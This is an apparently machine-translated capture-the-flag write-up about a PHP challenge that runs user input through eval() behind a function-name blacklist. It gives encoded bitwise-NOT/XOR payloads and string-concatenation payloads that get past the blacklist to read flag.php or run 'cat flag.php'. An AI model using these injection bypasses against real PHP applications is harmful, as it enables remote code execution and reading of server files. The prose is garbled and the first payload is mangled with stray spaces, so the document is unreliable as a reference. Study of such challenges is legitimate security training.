A few days ago to get a line game source code, definitive answers. This is the main road to bypass blacklist command
First look at the code given below:
<?php highlight_file(__FILE__); error_reporting(0); $blacklist = ["system", "ini_set", "exec", "scandir", "shell_exec", "proc_open", "error_log", "ini_alter", "ini_set", "pfsockopen", "readfile", "echo", "file_get_contents", "readlink", "symlink", "popen", "fopen", "file", "fpassthru"]; $blacklist = array_merge($blacklist, get_defined_functions()['internal']); foreach($blacklist as $i){ if(stristr($_GET[cmd], $i)!==false){ die('hack'); } } eval($_GET[cmd]); ?>
You can see the built-defined functions and sensitive functions are added to the Blacklist, the following two methods of solving the problem:
1. negated exclusive or bypass or
Flag in the file is known flag.php directly read configuration file flag.php negated Payload:
(~% 20% 8D% 9A% 9E% 9B% 99% 96% 93% 9A) ((~% 20% 99% 93% 9E% 98% D1% 8F% 97% 8F));
Sending a request to obtain the source code Flag:
Similarly, a different configuration or may be read into a file Payload Content:
${%ff%ff%ff%ff^%a0%b8%ba%ab}{%ff}("flag.php");&%ff=readfile
2. string concatenation bypass
This solution is given on ppt tournament organizers, is the command string concatenation and then realized through the implementation of a variable assignment
The first Payload is achieved by stitching function name:
$a='sys'.'tem';$a("cat flag.php");
The second Payload is achieved by splicing statement:
$a="syste";$b="m(%27cat%20flag.php%27);";$c=$a.$b;eval($c);
The principle is the same, not described in detail here, and what is not is closing!